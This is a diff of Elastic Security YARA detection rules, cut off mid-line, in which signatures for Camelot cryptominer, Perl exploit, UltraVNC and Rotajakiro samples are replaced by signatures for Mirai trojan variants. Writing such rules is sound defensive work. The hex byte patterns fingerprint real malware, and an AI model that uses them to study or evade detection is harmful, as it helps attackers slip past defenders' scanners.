"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc73bbfb12c64d2f20efa22a6d8d8c5782ef57cb0ca6d844669b262e80db2444" - logic_hash = "1a3a9065cbb59658c06dfbfc622ccd2e577e988370ffe47848a5859f96db4e24" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L80-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" + logic_hash = "97307f583240290de2bfc663b99f8dcdedace92885bd3e0c0340709b94c0bc2a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2ad8d0d00002c969c50fde6482d797d76d60572db5935990649054b5a103c5d1" + fingerprint = "6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101666,27 +102160,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_29C1C386 : FILE MEMORY os = "linux" strings: - $a = { 65 20 62 72 61 6E 63 68 00 00 00 49 67 6E 6F 72 69 6E 67 20 } + $a = { DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 10 0F B7 02 83 E9 02 83 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_25B63F54 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_6F021787 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "25b63f54-8a32-4866-8f90-b2949f5e7539" + id = "6f021787-9c2d-4536-bd90-5230c85a8718" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L119-L136" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "640ffe2040e382ad536c1b6947e05f8c25ff82897ef7ac673a7676815856a346" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L100-L118" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88183d71359c16d91a3252085ad5a270ad3e196fe431e3019b0810ecfd85ae10" + logic_hash = "7e8062682a0babbaa3c00975807ba9fc34c465afde55e4144944e7598f0ea1fd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c0bc4f5fc0ad846a90e214dfca8252bf096463163940930636c1693c7f3833fa" + fingerprint = "33ba39b77e55b1a2624e7846e06b2a820de9a8a581a7eec57e35b3a1636b8b0d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101694,28 +102189,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_25B63F54 : FILE MEMORY os = "linux" strings: - $a = { 0F 6F 39 66 41 0F 6F 32 66 4D 0F 7E C3 66 44 0F D4 CB 66 45 0F } + $a = { 55 D4 66 89 14 01 0F B6 45 D0 48 63 D0 48 89 D0 48 01 C0 48 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_73E2373E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_1E0C5Ce0 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "73e2373e-75ac-4385-b663-a50423626fc8" + id = "1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L138-L156" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc73bbfb12c64d2f20efa22a6d8d8c5782ef57cb0ca6d844669b262e80db2444" - logic_hash = "2377da6667860dc7204760ee64213cba95909c9181bd1a3ea96c3ad29988c9f7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L120-L138" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d" + logic_hash = "591cc3ef6932bf990f56c932866b34778e8eccd0e343f9bd6126eb8205a12ecc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6ce73e55565e9119a355b91ec16c2147cc698b1a57cc29be22639b34ba39eea9" + fingerprint = "8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101723,28 +102218,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_73E2373E : FILE MEMORY os = "linux" strings: - $a = { 45 F8 48 83 7D F8 00 74 4D 48 8B 55 80 48 8D 45 A0 48 89 D6 48 } + $a = { 4C 24 54 31 F6 41 B8 04 00 00 00 BA 03 00 00 00 C7 44 24 54 01 00 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_B8552Fff : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_22965A6D : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "b8552fff-29a9-4e09-810a-b4b52a7a3fb4" + id = "22965a6d-85d3-4f7c-be4a-581044581b77" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L158-L176" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cdd3d567fbcbdd6799afad241ae29acbe4ab549445e5c4fc0678d16e75b40dfa" - logic_hash = "476b800422b6d98405d8bde727bb589c5cae36723436b269beaa65381b3d0abe" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L140-L158" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "09c821aa8977f67878f8769f717c792d69436a951bb5ac06ce5052f46da80a48" + logic_hash = "6b2a46694edf709d28267268252cfe95d88049b7dca854059cfe44479ada7423" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d5998e0bf7df96dd21d404658589fb37b405398bd3585275419169b30c72ce62" + fingerprint = "a34bcba23cde4a2a49ef8192fa2283ce03c75b2d1d08f1fea477932d4b9f5135" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101752,28 +102247,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_B8552Fff : FILE MEMORY os = "linux" strings: - $a = { 18 8B 44 24 1C 8B 50 0C 83 E8 04 8B 0A FF 74 24 28 FF 74 24 28 FF 74 } + $a = { E6 4A 64 2B E4 82 D1 E3 F6 5E 88 34 DA 36 30 CE 4E 83 EC F1 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_83550472 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_4032Ade1 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "83550472-4c97-4afc-b187-1a7ffc9acbbc" + id = "4032ade1-4864-4637-ae73-867cd5fb7378" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L178-L196" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d2d8421ffdcebb7fed00edcf306ec5e86fc30ad3e87d55e85b05bea5dc1f7d63" - logic_hash = "f62d4a2a7dfb312b2e362844bfa29bd4453a05f31b4f72550ef29ff40ed6fb9d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L160-L178" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6150fbbefb916583a0e888dee8ed3df8ec197ba7c04f89fb24f31de50226e688" + logic_hash = "9c5e24c4efd4035408897f638d3579c3798139fd18178cee4a944b49c13e1532" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "63cf1cf09ad06364e1b1f15774400e0544dbb0f38051fc795b4fc58bd08262d1" + fingerprint = "2b150a6571f5a2475d0b4a2ddb75623d6fa1c861f5385a5c42af24db77573480" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101781,28 +102276,27 @@ rule ELASTIC_Linux_Cryptominer_Camelot_83550472 : FILE MEMORY os = "linux" strings: - $a = { FA 48 8D 4A 01 48 D1 E9 48 01 CA 48 29 F8 48 01 C3 49 89 C4 48 } + $a = { F8 0C 67 56 55 4C 06 87 DE B2 C0 79 AE 88 73 79 0C 7E F8 87 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_8799D8D6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_B14F4C5D : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "8799d8d6-714b-4837-be60-884d78e3b8f3" + id = "b14f4c5d-054f-46e6-9fa8-3588f1ef68b7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L198-L216" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4a6d98eae8951e5b9e0a226f1197732d6d14ed45c1b1534d3cdb4413261eb352" - logic_hash = "4bcd7931aeed09069d5dd248a66f119a2bdf628e03b9abed9ee2de59a149c2bc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L180-L197" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1a2114a7b397c850d732940a0e154bc04fbee1fdc12d343947b343b9b27a8af1" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "05c8d7c1d11352f2ec0b5d96a7b2378391ad9f8ae285a1299111aca38352f707" + fingerprint = "a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101810,28 +102304,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_8799D8D6 : FILE MEMORY os = "linux" strings: - $a = { 72 56 66 48 32 37 48 4D 5A 75 6D 74 46 75 4A 72 6D 48 47 38 } + $a = { 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_0F7C5375 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_C8385B81 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "0f7c5375-99dc-4204-833a-9128798ed2e9" + id = "c8385b81-0f5b-41c3-94bb-265ede946a84" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L218-L236" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e75be5377ad65abdc69e6c7f9fe17429a98188a217d0ca3a6f40e75c4f0c07e8" - logic_hash = "05f4b16a7e4c7ffbc6b8a2f60050a4ac1d05d9efbe948e2da689055f6383cf82" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L199-L217" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3d27736caccdd3199a14ce29d91b1812d1d597a4fa8472698e6df6ef716f5ce9" + logic_hash = "4ff1f0912fb92e7ac5af49e1738dac897ff1f0a118d8ff905da45b0a91b3f4a7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "53bb31c6ba477ed86e55ce31844055c26d7ab7392d78158d3f236d621181ca10" + fingerprint = "dfdbd4dbfe16bcf779adb16352d5e57e3950e449e96c10bf33a91efee7c085e5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101839,28 +102333,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_0F7C5375 : FILE MEMORY os = "linux" strings: - $a = { F8 7F 48 89 85 C0 00 00 00 77 08 48 83 85 C8 00 00 00 01 31 F6 48 } + $a = { 8D 74 26 00 89 C2 83 ED 04 C1 E2 0B 31 C2 89 F0 C1 E8 13 89 D1 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_87639Dbd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_122Ff2E6 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "87639dbd-da2d-4cf9-a058-16f4620a5a7f" + id = "122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L238-L256" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d2d8421ffdcebb7fed00edcf306ec5e86fc30ad3e87d55e85b05bea5dc1f7d63" - logic_hash = "b81af8c9baee999b91e63f97d5a46451d9960487b25b04079df5539f857be466" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L219-L237" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4" + logic_hash = "62884309b9095cdd6219c9ef6cd77a0f712640d8a1db4afe5b1d01f4bbe5acc2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c145df0a671691ef2bf17644ec7c33ebb5826d330ffa35120d4ba9e0cb486282" + fingerprint = "3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101868,28 +102362,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_87639Dbd : FILE MEMORY os = "linux" strings: - $a = { 45 00 48 83 C2 01 48 89 EF 48 89 53 38 FF 50 18 48 8D 7C 24 30 48 } + $a = { 24 EB 15 89 F0 83 C8 01 EB 03 8B 5B 08 3B 43 04 72 F8 8B 4B 0C 89 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_Cdd631C1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_26Cba88C : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "cdd631c1-2c03-47dd-b50a-e8c0b9f67271" - date = "2021-04-06" + id = "26cba88c-7bd4-4fac-b395-04c4745fee43" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L258-L276" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897" - logic_hash = "5e4b26a74fc3737c068917c7c1228048f885ac30fc326a2844611f7e707d1300" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L239-L257" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4b4758bff3dcaa5640e340d27abba5c2e2b02c3c4a582374e183986375e49be8" + logic_hash = "bb5a0f9e68655556ab9fccc27d11bf7828c299720bb67948455579d6a7eb2a9f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e" + fingerprint = "358dd5d916fec3e1407c490ce0289886985be8fabee49581afbc01dcf941733e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101897,28 +102391,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_Cdd631C1 : FILE MEMORY os = "linux" strings: - $a = { 00 5F 5A 4E 35 78 6D 72 69 67 35 50 6F 6F 6C 73 } + $a = { F6 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4A 00 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_209B02Dd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_93Fc3657 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "209b02dd-3087-475b-8d28-baa18647685b" - date = "2021-04-06" + id = "93fc3657-fd21-4e93-a728-c084fc0a6a4a" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L278-L296" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "60d33d1fdabc6b10f7bb304f4937051a53d63f39613853836e6c4d095343092e" - logic_hash = "5cadc955242d4b7d5fd4365a0b425051d89c905e3d49ea03967150de0020225c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L259-L277" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" + logic_hash = "0b5278feddd00b0b24ca735bf7cd1440379c6ce5aca6d2a6f38c9fdcedcb3c0d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5829daea974d581bb49ac08150b63b7b24e6fae68f669b6b7ab48418560894d4" + fingerprint = "d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101926,28 +102420,27 @@ rule ELASTIC_Linux_Cryptominer_Camelot_209B02Dd : FILE MEMORY os = "linux" strings: - $a = { 45 31 F5 44 0B 5C 24 F4 41 C1 EA 10 44 0B 54 24 } + $a = { 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C } condition: all of them } -rule ELASTIC_Linux_Exploit_Perl_4A4B8A42 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_7C88Acbc : FILE MEMORY { meta: - description = "Detects Linux Exploit Perl (Linux.Exploit.Perl)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "4a4b8a42-bf26-4323-a12d-06360cd88aa3" + id = "7c88acbc-8b98-4508-ac53-ab8af858660d" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Perl.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d1fa8520d3c3811d29c3d5702e7e0e7296b3faef0553835c495223a2bc015214" - logic_hash = "c1f7b1c20fe6db6acbe46be38cc97a40de6ca047a4e4490e86610dbff356b395" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L279-L296" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "76373f8e09b7467ac5d36e8baad3025a57568e891434297e53f2629a72cf8929" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "70ae986009e1d375a0322bf31fbae2090b7c0b6051ddd850e103e654d7b237b2" + fingerprint = "e2ef1c60e21f18e54694bcfc874094a941e5f61fa6144c5a0e44548dafa315be" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101955,28 +102448,28 @@ rule ELASTIC_Linux_Exploit_Perl_4A4B8A42 : FILE MEMORY os = "linux" strings: - $a = { 20 73 65 65 6B 69 6E 67 20 6F 75 74 20 74 68 65 20 73 6D 61 } + $a = "[Cobalt][%s][%s][%s][%s]" condition: all of them } -rule ELASTIC_Linux_Exploit_Perl_982Bb709 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_804F8E7C : FILE MEMORY { meta: - description = "Detects Linux Exploit Perl (Linux.Exploit.Perl)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "982bb709-beec-4f7f-b249-44b1fb46c3be" + id = "804f8e7c-4786-42bc-92e4-c68c24ca530e" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Perl.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e4e2b5af9d0c72aae83cec57e5c091a95c549f826e8f13559aaf7d300f6e13" - logic_hash = "b38e6cb15034c38c31f6b267b9ecaabe8dfa950a2fc8863cfff7705182cffb3a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L298-L316" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" + logic_hash = "711d74406d9b0d658b3b29f647bd659699ac0af9cd482403122124ec6054f1ec" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "a2f68acb31b84e93f902aeb838ad550e1644c20e1c8060bb8de8ad57fa4ba4bb" + fingerprint = "1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101984,91 +102477,86 @@ rule ELASTIC_Linux_Exploit_Perl_982Bb709 : FILE MEMORY os = "linux" strings: - $a = { 54 75 65 20 53 65 70 20 32 31 20 31 36 3A 34 38 3A 31 32 20 } + $a = { 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F } condition: all of them } -rule ELASTIC_Windows_Remoteadmin_Ultravnc_965F054A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_A2D2E15A : FILE MEMORY { meta: - description = "Detects Windows Remoteadmin Ultravnc (Windows.RemoteAdmin.UltraVNC)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "965f054a-4b78-43f3-87db-1ecd64c317a0" - date = "2023-03-18" - modified = "2023-04-23" + id = "a2d2e15a-a2eb-43c6-a43d-094ee9739749" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_RemoteAdmin_UltraVNC.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "59bddb5ccdc1c37c838c8a3d96a865a28c75b5807415fd931eaff0af931d1820" - logic_hash = "a9b9d0958f09b23fa7b27ef7ec32b3feb98edca3be5a21552a3a2f50e3fd41c1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L318-L336" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "567c3ce9bbbda760be81c286bfb2252418f551a64ba1189f6c0ec8ec059cee49" + logic_hash = "c76fe953c4a70110346a020f2b27c7e79f4ad8a24fd92ac26e5ddd1fed068f65" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7e612ffb9fdf94471f938039b4077d5546edd5d6f700733e1c1e732aef36ed42" + fingerprint = "0e57d17f5c0cd876248a32d4c9cbe69b5103899af36e72e4ec3119fa48e68de2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = ".\\vncsockconnect.cpp" - $s2 = ".\\vnchttpconnect.cpp" - $s3 = ".\\vncdesktopthread.cpp" - $s4 = "Software\\UltraVNC" - $s5 = "VncCanvas.class" - $s6 = "WinVNC_Win32_Instance_Mutex" - $s7 = "WinVNC.AddClient" + $a = { 42 F0 41 83 F8 01 76 5F 44 0F B7 41 10 4C 01 C0 44 8D 42 EE 41 83 } condition: - 5 of them + all of them } -rule ELASTIC_Linux_Trojan_Rotajakiro_Fb24F399 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_5946F41B : FILE MEMORY { meta: - description = "Detects Linux Trojan Rotajakiro (Linux.Trojan.Rotajakiro)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "fb24f399-d2bc-4cca-a3b8-4d924f11c83e" - date = "2021-06-28" + id = "5946f41b-594c-4fde-827c-616a99f6fc1b" + date = "2021-01-12" modified = "2021-09-16" - reference = "023a7f9ed082d9dd7be6eba5942bfa77f8e618c2d15a8bc384d85223c5b91a0c" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Rotajakiro.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "be33fdda50ef0ea1a0cf45835cc2b7a805cecb3fff371ed6d93e01c2d477d867" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L338-L356" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f0b6bf8a683f8692973ea8291129c9764269a6739650ec3f9ee50d222df0a38a" + logic_hash = "43691675db419426413ccc24aa9dfe94456fa1007630652b08a625eafd1f17b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6b19a49c93a0d3eb380c78ca21ce4f4d2991c35e68d2b75e173dc25118ba2c20" - severity = "100" + fingerprint = 